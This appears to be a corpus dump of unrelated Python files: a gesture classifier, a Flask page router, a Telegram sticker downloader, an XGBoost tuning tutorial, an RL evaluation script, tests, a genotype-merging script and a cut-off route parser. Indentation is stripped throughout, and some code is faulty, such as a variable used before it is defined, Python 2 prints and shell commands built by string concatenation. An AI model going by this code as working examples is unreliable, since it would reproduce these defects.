FORWARD = "FORWARD"
class Point:
def __init__(self, x, y, acc, index, desc):
self.x = x
self.y = y
self.acc = acc
self.index = index
self.desc = desc
def __str__(self):
return "[x: " + str(self.x) + ", y: " + str(self.y) + ", acc: " + str(
int(self.acc * 100)) + "%" + ", index: " + str(self.index) + ", desc: " + str(self.desc) + "]"
def __repr__(self):
return self.__str__()
def distance_to(self, point):
return math.sqrt(((self.x - point.x) ** 2) + ((self.y - point.y) ** 2))
def gradient_to(self, point):
return (self.y - point.y) / (self.x - point.x)
class Skeleton:
def __init__(self, frame, keypoints, required_accuracy):
self.frame = frame
self.keypoints = keypoints
self.required_accuracy = required_accuracy
def check_for_important_keypoints(self):
if 8 not in self.keypoints:
print("Hip not detected at frame " + str(self.frame) + "!")
return False
elif 8 in self.keypoints and self.keypoints[8].acc < self.required_accuracy:
print("Detected hip with low accuracy of ~" + str(int(self.keypoints[8].acc * 100)) + "% at frame " +
str(self.frame) + "!")
return False
elif 2 not in self.keypoints:
print("Right shoulder not detected at frame " + str(self.frame) + "!")
return False
elif 2 in self.keypoints and self.keypoints[2].acc < self.required_accuracy:
print("Detected right shoulder with low accuracy of ~" +
str(int(self.keypoints[2].acc * 100)) + "% at frame " + str(self.frame) + "!")
return False
elif 5 not in self.keypoints:
print("Left shoulder not detected at frame " + str(self.frame) + "!")
return False
elif 5 in self.keypoints and self.keypoints[5].acc < self.required_accuracy:
print("Detected left shoulder with low accuracy of ~" +
str(int(self.keypoints[5].acc * 100)) + "% at frame " + str(self.frame) + "!")
return False
elif 4 not in self.keypoints:
print("Right hand not detected at frame " + str(self.frame) + "!")
return False
elif 4 in self.keypoints and self.keypoints[4].acc < self.required_accuracy:
print("Detected right hand with low accuracy of ~" +
str(int(self.keypoints[4].acc * 100)) + "% at frame " + str(self.frame) + "!")
return False
elif 7 not in self.keypoints:
print("Left hand not detected at frame " + str(self.frame) + "!")
return False
elif 7 in self.keypoints and self.keypoints[7].acc < self.required_accuracy:
print("Detected left hand with low accuracy of ~" +
str(int(self.keypoints[7].acc * 100)) + "% at frame " + str(self.frame) + "!")
return False
return True
def transform_points(self):
for key in self.keypoints:
if self.keypoints[key].index is not 8:
self.keypoints[key].x = self.keypoints[key].x - self.keypoints[8].x
self.keypoints[key].y = self.keypoints[8].y - self.keypoints[key].y
self.keypoints[8].x = 0
self.keypoints[8].y = 0
class PoseDetector:
def __init__(self, skeleton):
self.skeleton = skeleton
self.handGradient = None
self.handDistance = None
self.shoulderDistance = None
self.handToShoulderDistance = None
def calc_hand_gradient(self):
if self.skeleton.keypoints[4] is not None and self.skeleton.keypoints[7] is not None:
self.handGradient = self.skeleton.keypoints[7].gradient_to(self.skeleton.keypoints[4])
else:
self.handGradient = None
def get_hand_gradient(self):
if self.handGradient is None:
self.calc_hand_gradient()
return self.handGradient
def calc_hand_distance(self):
if self.skeleton.keypoints[4] is not None and self.skeleton.keypoints[7] is not None:
self.handDistance = self.skeleton.keypoints[7].distance_to(self.skeleton.keypoints[4])
else:
self.handDistance = None
def get_hand_distance(self):
if self.handDistance is None:
self.calc_hand_distance()
return self.handDistance
def calc_shoulder_distance(self):
if self.skeleton.keypoints[5] is not None and self.skeleton.keypoints[2] is not None:
self.shoulderDistance = self.skeleton.keypoints[5].distance_to(self.skeleton.keypoints[2])
else:
self.shoulderDistance = None
def get_shoulder_distance(self):
if self.shoulderDistance is None:
self.calc_shoulder_distance()
return self.shoulderDistance
def calc_hand_to_shoulder_distance(self):
if self.skeleton.keypoints[5] is not None and self.skeleton.keypoints[2] is not None and \
self.skeleton.keypoints[7] is not None and self.skeleton.keypoints[4] is not None:
right_distance = self.skeleton.keypoints[2].y - self.skeleton.keypoints[4].y
left_distance = self.skeleton.keypoints[5].y - self.skeleton.keypoints[7].y
self.handToShoulderDistance = (right_distance + left_distance) / 2
else:
self.handToShoulderDistance = None
def get_hand_to_shoulder_distance(self):
if self.handToShoulderDistance is None:
self.calc_hand_to_shoulder_distance()
return self.handToShoulderDistance
def detect_pose(self):
# Right turn: left hand up, right hand down
# => high hand gradient
if self.get_hand_gradient() > 0.7:
return Pose.TURN_RIGHT
# Left turn: left hand down, right hand up
# => high negative hand gradient
elif self.get_hand_gradient() < -0.7:
return Pose.TURN_LEFT
# Forward: both hands at shoulder height, close distance
# => low hand gradient, hands distance is close to shoulder distance, hands height is close to shoulders height
elif -0.2 <= self.get_hand_gradient() <= 0.2 \
and self.get_shoulder_distance() - 100 <= self.get_hand_distance() <= self.get_shoulder_distance() + 100 \
and -50 <= self.get_hand_to_shoulder_distance() <= 50:
return Pose.FORWARD
# Throttle up: both hands high, close distance
# => hands height is higher than shoulder height, low hand gradient, low hands distance
elif self.get_hand_to_shoulder_distance() <= -100 \
and -0.2 <= self.get_hand_gradient() <= 0.2 \
and self.get_shoulder_distance() - 50 <= self.get_hand_distance() <= self.get_shoulder_distance() + 250:
return Pose.THROTTLE_UP
# Throttle down: both hands low, close distance
# => hands height is lower than shoulder height, low hand gradient, low hands distance
elif self.get_hand_to_shoulder_distance() > 0 \
and -0.2 <= self.get_hand_gradient() <= 0.2 \
and self.get_shoulder_distance() - 50 <= self.get_hand_distance() <= self.get_shoulder_distance() + 250:
return Pose.THROTTLE_DOWN
# Default:
# => hold position
else:
return Pose.HOLD
def return_number(number):
if number is None:
return "None"
else:
return str(round(number, 2))
log_file = open("../data/OpenPose Demo#1/log_minified", "r")
content = log_file.read()
parsed_data = json.loads(content)
total_scanned = 0
missing_keypoints = 0
for frame_set in parsed_data:
points = {}
for keypoint in frame_set["points"]:
points[keypoint["part"]] = Point(keypoint["x"], keypoint["y"], keypoint["accuracy"], keypoint["part"],
keypoint["description"])
skeleton = Skeleton(frame_set["index"], points, 0.4)
total_scanned += 1
if skeleton.check_for_important_keypoints():
skeleton.transform_points()
detector = PoseDetector(skeleton)
pose = detector.detect_pose()
print(pose + " (frame " + str(skeleton.frame) + " with HD " +
return_number(detector.handDistance) + "/HG " + return_number(detector.handGradient) + "/SD " +
return_number(detector.shoulderDistance) + "/HSD " + return_number(detector.handToShoulderDistance) + ")")
else:
missing_keypoints += 1
print("Detection rate: " + str(100 - round(100 * (missing_keypoints * 1.0 / total_scanned), 2)) + "% (" + str(
total_scanned - missing_keypoints) + "/" + str(total_scanned) + ")")
| StarcoderdataPython |
3344776 | from flask import abort, Blueprint, render_template
from jinja2.exceptions import TemplateNotFound
bp = Blueprint('pages', __name__, template_folder='templates')
pages_list = [
{
"page": "dichotomy-method",
"headline": "Dichotomy (Bisection method)",
"text": "Dichotomy (or Bisection) method is a root-finding "
"method that applies to any continuous functions for "
"which one knows two values with opposite signs.",
},
{
"page": "fixed-point-iteration",
"headline": "Fixed-point iteration",
"text": "Fixed-point iteration is a method of computing fixed points "
"of iterated functions. It can be also applied for finding the "
"root of continuous function"
},
{
"page": "linear-system",
"headline": "System of linear equations",
"text": "System of linear equations is a collection "
"of two or more linear equations involving the same set of variables."
"We will take a look at 2 methods of solving linear systems: Gaussian"
"elimination and Jacobi method"
},
{
"page": "unnamed-matrix",
"headline": "Unnamed matrix",
"text": "This is not a general method or something. It is required just to get the matrix based on some characteristics."
},
{
"page": "intersection-of-surfaces",
"headline": "Intersection of surfaces",
"text": "Intersection of surfaces... Ellipsoid and the plane."
},
{
"page": "cubic-splines",
"headline": "Cubic splines",
"text": "Cubic splines method is one of dozens methods of function interpolating."
},
{
"page" : "chebyshev-aproximation",
"headline": "Chebyshev polynoms & approximation",
"text": "Approximation of function using chebyshev polynoms",
},
{
"page" : "pelengate-problem",
"headline": "Pelengator problem",
"text": "Solution of pelengator problem using Newton method",
},
{
"page" : "runge-kutta",
"headline": "Runge-Kutta method",
"text": "Solution of Cauchy's problem using Runge-Kutta method",
},
{
"page" : "runge-kutta-pendulum",
"headline": "Runge-Kutta method for equation of pendulum",
"text": "Solution of diff. eq. of pendulum",
},
{
"page" : "runge-kutta-foxes-and-rabbits",
"headline": "Rabbits and foxes problem",
"text": "Runge-Kutta method for solving equations of modelling rabbits/foxes population",
},
]
@bp.route('/', defaults={'page': 'index'})
@bp.route('/<page>')
def get_page(page):
try:
if page == 'index':
return render_template('index.html', pages=pages_list)
else:
return render_template('%s.html' % page)
except TemplateNotFound:
abort(400)
| StarcoderdataPython |
1646868 | <filename>telegram_bot/sticker_set_downloader.py
''''''
import os
from PIL import Image
from telegram import Bot
from global_config.protected_config import _telegrambot_token
from global_config.environment_config import _base_dir, _temp_dir
from telegram_bot.func_helper import random_string, zip_dir
class StickerSetDownloader():
def __init__(self):
''''''
self.num_threads = 4
self.bot = Bot(_telegrambot_token)
@staticmethod
def webp2png(in_file_path, out_file_path):
''''''
im = Image.open(in_file_path)
im.save(out_file_path, 'PNG')
return out_file_path
@staticmethod
def tgs2mp4(in_file_path, out_file_path):
''''''
json_path = out_file_path.replace('mp4', 'json')
command = 'tgsconvert.py %(tgs)s %(json)s > /dev/null 2>&1'
command = command % {'tgs': in_file_path, 'json': json_path}
status = os.system(command)
if status != 0:
os.path.isfile(json_path) and os.remove(json_path)
raise Exception('tgsconvert.py error: execute .tgs => .json')
command = 'puppeteer-lottie -q -i %(json)s -o %(mp4)s > /dev/null 2>&1'
command = command % {'json': json_path, 'mp4': out_file_path}
status = os.system(command)
os.path.isfile(json_path) and os.remove(json_path)
if status != 0:
raise Exception('puppeteer-lottie error: execute .json => .mp4')
else:
return out_file_path
@staticmethod
def mp42gif(in_file_path, out_file_path):
''''''
command = 'ffmpeg -y -i %(mp4)s -filter_complex "fps=30" %(gif)s'
command = command % {'mp4': in_file_path, 'gif': out_file_path}
status = os.system(command + ' > /dev/null 2>&1')
if status != 0:
raise Exception('ffmpeg error: execute .mp4 => .gif')
else:
return out_file_path
def download_sticker(self, file_id, save_dir=None, random_name=False):
''''''
sticker = file_id if not isinstance(file_id, str) else self.bot.get_file(file_id)
# use default `temp` path
save_dir = save_dir or _temp_dir
file_name = sticker.file_path.split('/')[-1]
if random_name:
file_name = random_string() + '.webp'
file_path = os.path.join(save_dir, file_name)
out_path = file_path.replace('webp', 'png')
# download and convert
sticker.download(custom_path=file_path)
self.webp2png(file_path, out_path)
return (file_path, out_path)
def download_sticker_set(self, sticker_set_name, out_path=None):
''''''
sticker_set = self.bot.get_sticker_set(sticker_set_name)
stickers = sticker_set.stickers
# make dir `sticker_set_name`
file_dir = os.path.join(_temp_dir, sticker_set_name)
os.path.isdir(file_dir) or os.makedirs(file_dir)
# download and convert
for sticker in stickers:
file_id = sticker.file_id
webp_path, _ = self.download_sticker(file_id, save_dir=file_dir, random_name=True)
os.path.isfile(webp_path) and os.remove(webp_path)
# zip
out_path = out_path or file_dir + '.zip'
zip_dir(file_dir, out_path)
return out_path
def download_sticker_animated(self, file_id, save_dir=None, random_name=False):
''''''
sticker = file_id if not isinstance(file_id, str) else self.bot.get_file(file_id)
# use default `temp` path
save_dir = save_dir or _temp_dir
file_name = sticker.file_path.split('/')[-1]
if random_name:
file_name = random_string() + '.tgs'
file_path = os.path.join(save_dir, file_name)
out_path_mp4 = file_path.replace('tgs', 'mp4')
out_path_gif = file_path.replace('tgs', 'gif')
# download and convert
sticker.download(custom_path=file_path)
self.tgs2mp4(file_path, out_path_mp4)
self.mp42gif(out_path_mp4, out_path_gif)
return (file_path, out_path_mp4, out_path_gif)
def download_sticker_animated_pack(self, file_id, pack_name, out_path=None):
''''''
# make dir `pack_name`
file_dir = os.path.join(_temp_dir, pack_name)
os.path.isdir(file_dir) or os.makedirs(file_dir)
# download and convert
self.download_sticker_animated(file_id, save_dir=file_dir, random_name=True)
# zip
out_path = out_path or file_dir + '.zip'
zip_dir(file_dir, out_path)
return out_path
_sticker = StickerSetDownloader()
download_sticker = _sticker.download_sticker
download_sticker_set = _sticker.download_sticker_set
download_sticker_animated_pack = _sticker.download_sticker_animated_pack
if __name__ == '__main__':
pass
| StarcoderdataPython |
146368 |
"""
General Approach for Parameter Tuning
We will use an approach similar to that of GBM here. The various steps to be performed are:
1.Choose a relatively high learning rate. Generally a learning rate of 0.1 works but somewhere
between 0.05 to 0.3 should work for different problems. Determine the optimum number of trees
for this learning rate. XGBoost has a very useful function called as “cv” which performs cross-validation
at each boosting iteration and thus returns the optimum number of trees required.
Tune tree-specific parameters ( max_depth, min_child_weight, gamma, subsample, colsample_bytree)
for decided learning rate and number of trees. Note that we can choose different parameters to
define a tree and I’ll take up an example here.
Tune regularization parameters (lambda, alpha) for xgboost which can help reduce model complexity
and enhance performance.
Lower the learning rate and decide the optimal parameters.
Let us look at a more detailed step by step approach.
"""
### below may be helpful
def modelfit(alg, dtrain, predictors, useTrainCV=True, cv_folds=5, early_stopping_rounds=50):
if useTrainCV:
xgb_param = alg.get_xgb_params()
xgtrain = xgb.DMatrix(dtrain[predictors].values, label=dtrain[target].values)
cvresult = xgb.cv(xgb_param, xgtrain, num_boost_round=alg.get_params()['n_estimators'], nfold=cv_folds,
metrics='auc', early_stopping_rounds=early_stopping_rounds, show_progress=False)
alg.set_params(n_estimators=cvresult.shape[0])
#Fit the algorithm on the data
alg.fit(dtrain[predictors], dtrain['Disbursed'],eval_metric='auc')
#Predict training set:
dtrain_predictions = alg.predict(dtrain[predictors])
dtrain_predprob = alg.predict_proba(dtrain[predictors])[:,1]
#Print model report:
print "\nModel Report"
print "Accuracy : %.4g" % metrics.accuracy_score(dtrain['Disbursed'].values, dtrain_predictions)
print "AUC Score (Train): %f" % metrics.roc_auc_score(dtrain['Disbursed'], dtrain_predprob)
feat_imp = pd.Series(alg.booster().get_fscore()).sort_values(ascending=False)
feat_imp.plot(kind='bar', title='Feature Importances')
plt.ylabel('Feature Importance Score')
"""
Step 1: Fix learning rate and number of estimators for tuning tree-based parameters
In order to decide on boosting parameters, we need to set some initial values of other parameters.
Lets take the following values:
max_depth = 5 : This should be between 3-10. I’ve started with 5 but you can choose a different
number as well. 4-6 can be good starting points.
min_child_weight = 1 : A smaller value is chosen because it is a highly imbalanced class problem
and leaf nodes can have smaller size groups.
gamma = 0 : A smaller value like 0.1-0.2 can also be chosen for starting. This will anyways be tuned later.
subsample, colsample_bytree = 0.8 : This is a commonly used used start value. Typical values range between
0.5-0.9.
scale_pos_weight = 1: Because of high class imbalance.
Please note that all the above are just initial estimates and will be tuned later.
Lets take the default learning rate of 0.1 here and check the optimum number of trees
using cv function of xgboost. The function defined above will do it for us.
"""
#Choose all predictors except target & IDcols
predictors = [x for x in train.columns if x not in [target, IDcol]]
xgb1 = XGBClassifier(
learning_rate =0.1,
n_estimators=1000,
max_depth=5,
min_child_weight=1,
gamma=0,
subsample=0.8,
colsample_bytree=0.8,
objective= 'binary:logistic',
nthread=4,
scale_pos_weight=1,
seed=27)
modelfit(xgb1, train, predictors)
"""
Step 2: Tune max_depth and min_child_weight
This is in lieu of the for loop that I employed on the initial XGBoost taxi data run.
Spits out a big matrix of paramater combinations and you select the best ones, based on the value
We tune these first as they will have the highest impact on model outcome. To start with,
let’s set wider ranges and then we will perform another iteration for smaller ranges.
Important Note: I’ll be doing some heavy-duty grid searched in this section which can take 15-30 mins
or even more time to run depending on your system. You can vary the number of values you are testing
based on what your system can handle.
"""
param_test1 = {
'max_depth':range(3,10,2),
'min_child_weight':range(1,6,2)
}
gsearch1 = GridSearchCV(estimator = XGBClassifier( learning_rate =0.1, n_estimators=140, max_depth=5,
min_child_weight=1, gamma=0, subsample=0.8, colsample_bytree=0.8,
objective= 'binary:logistic', nthread=4, scale_pos_weight=1, seed=27),
param_grid = param_test1, scoring='roc_auc',n_jobs=4,iid=False, cv=5)
gsearch1.fit(train[predictors],train[target])
gsearch1.grid_scores_, gsearch1.best_params_, gsearch1.best_score_
"""
Here, we have run 12 combinations with wider intervals between values.
The ideal values are 5 for max_depth and 5 for min_child_weight.
Lets go one step deeper and look for optimum values. We’ll search for values 1 above and
below the optimum values because we took an interval of two.
"""
param_test2 = {
'max_depth':[4,5,6],
'min_child_weight':[4,5,6]
}
gsearch2 = GridSearchCV(estimator = XGBClassifier( learning_rate=0.1, n_estimators=140, max_depth=5,
min_child_weight=2, gamma=0, subsample=0.8, colsample_bytree=0.8,
objective= 'binary:logistic', nthread=4, scale_pos_weight=1,seed=27),
param_grid = param_test2, scoring='roc_auc',n_jobs=4,iid=False, cv=5)
gsearch2.fit(train[predictors],train[target])
gsearch2.grid_scores_, gsearch2.best_params_, gsearch2.best_score_
"""
Here, we get the optimum values as 4 for max_depth and 6 for min_child_weight.
Also, we can see the CV score increasing slightly. Note that as the model performance increases,
it becomes exponentially difficult to achieve even marginal gains in performance.
You would have noticed that here we got 6 as optimum value for min_child_weight
but we haven’t tried values more than 6. We can do that as follow:.
"""
param_test2b = {
'min_child_weight':[6,8,10,12]
}
gsearch2b = GridSearchCV(estimator = XGBClassifier( learning_rate=0.1, n_estimators=140, max_depth=4,
min_child_weight=2, gamma=0, subsample=0.8, colsample_bytree=0.8,
objective= 'binary:logistic', nthread=4, scale_pos_weight=1,seed=27),
param_grid = param_test2b, scoring='roc_auc', n_jobs=4, iid=False, cv=5)
gsearch2b.fit(train[predictors],train[target])
modelfit(gsearch3.best_estimator_, train, predictors)
gsearch2b.grid_scores_, gsearch2b.best_params_, gsearch2b.best_score_
"""
We see 6 as the optimal value.
"""
"""
Step 3: Tune gamma
Now lets tune gamma value using the parameters already tuned above.
Gamma can take various values but I’ll check for 5 values here.
You can go into more precise values as.
"""
param_test3 = {
'gamma':[i/10.0 for i in range(0,5)]
}
gsearch3 = GridSearchCV(estimator = XGBClassifier( learning_rate =0.1, n_estimators=140, max_depth=4,
min_child_weight=6, gamma=0, subsample=0.8, colsample_bytree=0.8,
objective= 'binary:logistic', nthread=4, scale_pos_weight=1,seed=27),
param_grid = param_test3, scoring='roc_auc',n_jobs=4,iid=False, cv=5)
gsearch3.fit(train[predictors],train[target])
gsearch3.grid_scores_, gsearch3.best_params_, gsearch3.best_score_
"""
This shows that our original value of gamma, i.e. 0 is the optimum one.
Before proceeding, a good idea would be to re-calibrate the number of boosting rounds for the
updated parameters."""
xgb2 = XGBClassifier(
learning_rate =0.1,
n_estimators=1000,
max_depth=4,
min_child_weight=6,
gamma=0,
subsample=0.8,
colsample_bytree=0.8,
objective= 'binary:logistic',
nthread=4,
scale_pos_weight=1,
seed=27)
modelfit(xgb2, train, predictors)
"""
Here, we can see the improvement in score. So the final parameters are:
max_depth: 4
min_child_weight: 6
gamma: 0"""
"""Step 4: Tune subsample and colsample_bytree
The next step would be try different subsample and colsample_bytree values.
Lets do this in 2 stages as well and take values 0.6,0.7,0.8,0.9 for both to start with."""
param_test4 = {
'subsample':[i/10.0 for i in range(6,10)],
'colsample_bytree':[i/10.0 for i in range(6,10)]
}
gsearch4 = GridSearchCV(estimator = XGBClassifier( learning_rate =0.1, n_estimators=177, max_depth=4,
min_child_weight=6, gamma=0, subsample=0.8, colsample_bytree=0.8,
objective= 'binary:logistic', nthread=4, scale_pos_weight=1,seed=27),
param_grid = param_test4, scoring='roc_auc',n_jobs=4,iid=False, cv=5)
gsearch4.fit(train[predictors],train[target])
gsearch4.grid_scores_, gsearch4.best_params_, gsearch4.best_score_
param_test5 = {
'subsample':[i/100.0 for i in range(75,90,5)],
'colsample_bytree':[i/100.0 for i in range(75,90,5)]
}
gsearch5 = GridSearchCV(estimator = XGBClassifier( learning_rate =0.1, n_estimators=177, max_depth=4,
min_child_weight=6, gamma=0, subsample=0.8, colsample_bytree=0.8,
objective= 'binary:logistic', nthread=4, scale_pos_weight=1,seed=27),
param_grid = param_test5, scoring='roc_auc',n_jobs=4,iid=False, cv=5)
gsearch5.fit(train[predictors],train[target])
"""
Step 5: Tuning Regularization Parameters
Next step is to apply regularization to reduce overfitting.
Though many people don’t use this parameters much as gamma provides a substantial way of controlling
complexity. But we should always try it. I’ll tune ‘reg_alpha’ value here and leave it upto you to
try different values of ‘reg_lambda’."""
param_test6 = {
'reg_alpha':[1e-5, 1e-2, 0.1, 1, 100]
}
gsearch6 = GridSearchCV(estimator = XGBClassifier( learning_rate =0.1, n_estimators=177, max_depth=4,
min_child_weight=6, gamma=0.1, subsample=0.8, colsample_bytree=0.8,
objective= 'binary:logistic', nthread=4, scale_pos_weight=1,seed=27),
param_grid = param_test6, scoring='roc_auc',n_jobs=4,iid=False, cv=5)
gsearch6.fit(train[predictors],train[target])
gsearch6.grid_scores_, gsearch6.best_params_, gsearch6.best_score_
"""We can see that the CV score is less than the previous case.
But the values tried are very widespread, we should try values closer to the optimum here (0.01)
to see if we get something better."""
param_test7 = {
'reg_alpha':[0, 0.001, 0.005, 0.01, 0.05]
}
gsearch7 = GridSearchCV(estimator = XGBClassifier( learning_rate =0.1, n_estimators=177, max_depth=4,
min_child_weight=6, gamma=0.1, subsample=0.8, colsample_bytree=0.8,
objective= 'binary:logistic', nthread=4, scale_pos_weight=1,seed=27),
param_grid = param_test7, scoring='roc_auc',n_jobs=4,iid=False, cv=5)
gsearch7.fit(train[predictors],train[target])
gsearch7.grid_scores_, gsearch7.best_params_, gsearch7.best_score_
#You can see that we got a better CV.
#Now we can apply this regularization in the model and look at the impact:
xgb3 = XGBClassifier(
learning_rate =0.1,
n_estimators=1000,
max_depth=4,
min_child_weight=6,
gamma=0,
subsample=0.8,
colsample_bytree=0.8,
reg_alpha=0.005,
objective= 'binary:logistic',
nthread=4,
scale_pos_weight=1,
seed=27)
modelfit(xgb3, train, predictors)
"""Step 6: Reducing Learning Rate
Lastly, we should lower the learning rate and add more trees.
Lets use the cv function of XGBoost to do the job again."""
xgb4 = XGBClassifier(
learning_rate =0.01,
n_estimators=5000,
max_depth=4,
min_child_weight=6,
gamma=0,
subsample=0.8,
colsample_bytree=0.8,
reg_alpha=0.005,
objective= 'binary:logistic',
nthread=4,
scale_pos_weight=1,
seed=27)
modelfit(xgb4, train, predictors)
"""
Now we can see a significant boost in performance and the effect of parameter tuning is clearer.
As we come to the end, I would like to share 2 key thoughts:
It is difficult to get a very big leap in performance by just using parameter tuning or slightly
better models. The max score for GBM was 0.8487 while XGBoost gave 0.8494.
This is a decent improvement but not something very substantial.
A significant jump can be obtained by other methods like feature engineering,
creating ensemble of models, stacking, etc
You can also download the iPython notebook with all these model codes from my GitHub account.
For codes in R, you can refer to this article."""
| StarcoderdataPython |
3377568 | import os
import yaml
import argparse
import numpy as np
import torch
from discor.env import make_env
from discor.algorithm import EvalAlgorithm
def test(env, algo, render):
state = env.reset()
episode_return = 0.0
success = 0.0
done = False
while (not done):
action = algo.exploit(state)
next_state, reward, done, info = env.step(action)
if render:
env.render()
episode_return += reward
if env.is_metaworld and info['success'] > 1e-6:
success = info['success']
state = next_state
return episode_return, success
def run(args):
with open(args.config) as f:
config = yaml.load(f, Loader=yaml.SafeLoader)
policy_hidden_units = config['SAC']['policy_hidden_units']
# Create environments.
env = make_env(args.env_id)
env.seed(args.seed)
# Device to use.
device = torch.device(
"cuda" if args.cuda and torch.cuda.is_available() else "cpu")
# Evaluation algorithm.
algo = EvalAlgorithm(
state_dim=env.observation_space.shape[0],
action_dim=env.action_space.shape[0],
device=device,
policy_hidden_units=policy_hidden_units)
algo.load_models(os.path.join(args.log_dir, 'model', 'best'))
returns = np.empty((args.num_episodes))
success = np.empty((args.num_episodes))
env.render()
env.viewer._paused = True
for i in range(args.num_episodes):
returns[i], success[i] = test(env, algo, args.render)
env.viewer._paused = True
print('-' * 60)
print(f'Num Episodes: {args.num_episodes:<5}\n'
f'Mean Return : {returns.mean():<5.1f} '
f'+/- {returns.std():<5.1f} ')
if env.is_metaworld:
print(f'Success rate: {success.mean():<1.3f} ')
print('-' * 60)
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument(
'--config', type=str, default=os.path.join('config', 'metaworld.yaml'))
parser.add_argument('--env_id', type=str, default='hammer-v1')
parser.add_argument('--log_dir', type=str, required=True)
parser.add_argument('--num_episodes', type=int, default=10)
parser.add_argument('--render', action='store_true')
parser.add_argument('--cuda', action='store_true')
parser.add_argument('--seed', type=int, default=0)
args = parser.parse_args()
run(args)
| StarcoderdataPython |
133437 | import pytest
# Code that uses this is commented-out below.
# from ..types import TrackingItem
pytestmark = [pytest.mark.setone, pytest.mark.working, pytest.mark.schema]
@pytest.fixture
def tracking_item():
return {"tracking_type": "other", "other_tracking": {"extra_field": "extra_value"}}
def test_insert_and_get_tracking_item(testapp, tracking_item):
res = testapp.post_json('/tracking-items', tracking_item, status=201)
assert res.json['@graph'][0]['tracking_type'] == tracking_item['tracking_type']
res_uuid = res.json['@graph'][0]['uuid']
get_res = testapp.get('/tracking-items/' + res_uuid).follow()
assert get_res.json['other_tracking']['extra_field'] == tracking_item['other_tracking']['extra_field']
assert get_res.json.get('date_created')
# def test_tracking_item_create_and_commit(testapp, dummy_request):
# test_body = {
# "tracking_type": "other",
# "other_tracking": {"key1": "val1"},
# "submitted_by": "<EMAIL>"
# }
# res = TrackingItem.create_and_commit(dummy_request, test_body)
# assert res['status'] == 'success'
# res_path = res['@graph'][0]
# app_res = testapp.get(res_path)
# assert app_res.json['tracking_type'] == test_body['tracking_type']
# assert app_res.json['other_tracking']['key1'] == test_body['other_tracking']['key1']
# # should not have date created in this case (no validators run)
# assert 'date_created' not in app_res.json
# # however status is added automatically when using create_and_commit fxn
# assert app_res.json['status'] == 'in review by lab'
| StarcoderdataPython |
194770 | <reponame>janaobsteter/Genotype_CODES<filename>CheckMergedFiles.py
import os
import GenFiles
import pandas as pd
from collections import defaultdict
import subprocess
import re
from itertools import chain
workdir = "/home/jana/Genotipi/Genotipi_DATA/Rjava_TEMP/"
os.chdir("/home/jana/Genotipi/Genotipi_DATA/Rjava_TEMP/")
os.system("ls -d Genotipi*/ > Dirs.txt")
dirs = list(pd.read_table("Dirs.txt", header=None).loc[:,0])
print(dirs)
chips = {19720: "GGPv02",
26145: "GGPv03",
26151: "GGPv03",
30105: "GGPv04",
30106: "GGPv04",
76883: "HD" ,
138892: "HDv02",
139376: "HDv02",
54001:"50Kv01" ,
54609: "50Kv02",
51274: "IDBv03",
52445: "IDBv03"
}
print(chips.values())
pedChip = defaultdict()
for dir in dirs:
peds = [x.strip(".ped") for x in os.listdir(workdir + "/" + dir + "/") if x.endswith(".ped") and "Clean" not in x]
for ped in peds:
try:
if GenFiles.mapFile(workdir + "/" + dir + "/" + ped + ".map").chip in chips.values():
pedChip[workdir + "/" + dir + "/" + ped] = GenFiles.mapFile(workdir + "/" + dir + "/" + ped + ".map").chip
except:
pass
print(pedChip)
mergedir = "/home/jana/Genotipi/Genotipi_DATA/Genotipi_latest/Rjava/Top/"
compareDF = pd.DataFrame(columns=["File", "Concordance", "Format", "NumIndiv"])
comparedir = "/home/jana/Genotipi/Genotipi_DATA/Compare/"
os.chdir(comparedir)
for ped in pedChip.keys():
print(ped)
os.system("cut " + ped + '.ped -f1,2 -d" " > Inds.txt')
numindiv = os.popen("less Inds.txt | wc -l").read().strip()
os.system("cut " + ped + '.ped -f1500 -d" " | sort | uniq > Alleles.txt')
alleles = open("Alleles.txt").read().strip().split("\n")
print(alleles)
if 'G' in alleles:
format = "Top"
if 'B' in alleles:
format = "AB"
if alleles == ['A']:
print(ped + ": only A in alleles.")
pass
print("Format: " + format)
mergedir = "/home/jana/Genotipi/Genotipi_DATA/Genotipi_latest/Rjava/" + format + "/"
try:
os.system("plink --file " + ped + " --merge " +
mergedir + pedChip[ped] + "/" + "PLINK_MERGED.ped " +
mergedir + pedChip[ped] + "/" + "PLINK_MERGED.map --cow --recode --out DIFF0")
print("plink --file " + ped + " --merge " +
mergedir + pedChip[ped] + "/" + "PLINK_MERGED.ped " +
mergedir + pedChip[ped] + "/" + "PLINK_MERGED.map --cow --recode --out " + ped.split("/")[-1] + "DIFF0")
out = open(comparedir + "DIFF0.log").read().strip().split("\n")
print(out)
c = [x for x in chain.from_iterable([x.split(" ") for x in out if "Variant" in x]) if
bool(re.search(r'\d', x))]
print(c)
print(os.getcwd())
pd.DataFrame({"Variant": c}).to_csv(comparedir + "SpuriousSNPs.txt", header=None, index=None)
os.system("""sed -i "s/'//g" """ + comparedir + "SpuriousSNPs.txt")
os.system("grep -Fwf " + comparedir + "SpuriousSNPs.txt " + ped + ".map > " + comparedir + "RemoveSNPs.txt")
os.system("plink --file " + ped + " --merge " +
mergedir + pedChip[ped] + "/" + "PLINK_MERGED.ped " +
mergedir + pedChip[
ped] + "/" + "PLINK_MERGED.map --exclude RemoveSNPs.txt --merge-mode 7 --cow "
"--keep Inds.txt --recode --out DIFF > DIFFtmp.txt")
a = open("DIFFtmp.txt").read().strip().split("\n")
c = [x for x in a if "concordance rate" in x][0].split(" ")[-1].strip(".")
compareDF = compareDF.append(pd.DataFrame({"File": [ped.split("/")[-1]], "Concordance": [c], "Format": [format],
"NumIndiv": numindiv}))
except:
pass
compareDF.to_csv(comparedir + "CompareDF.csv") | StarcoderdataPython |
1724074 | import re
import csv
import ipaddress
__version__ = 1.0
# Each route will have the following values
class Route_Template(object):
def __init__(self):
self.route = {}
self.protocol = []
self.metric = []
self.next_hop = []
self.age = []
self.interface = []
def __repr__(self):
return str(self.route)
# The main code structure
class RouteParse(object):
def __init__(self):
self.route_table = {}
self.Read_File()
self.Generate_Output_To_File()
# Retrieve a route object if it exists
def Get_Route_Object(self,target_route):
for route in self.route_table:
if target_route in route:
return self.route_table[route]
return None
# If the regular expression picked up a valid route, extract the values into a temporary dictionary
def Get_Route_Values_From_Match(self,matchObj):
values = {}
for keyword, value in vars(Route_Template()).items():
if keyword in matchObj.groupdict():
val = str(matchObj.group(keyword).strip())
values[keyword] = val
else:
values[keyword] = "N/A"
return values
# Create a new route object using the values from the temporary dictionary
def Create_New_Route(self,match):
route = self.Get_Route_Values_From_Match(match)
route_prefix = route["route"]
if not self.Get_Route_Object(route_prefix):
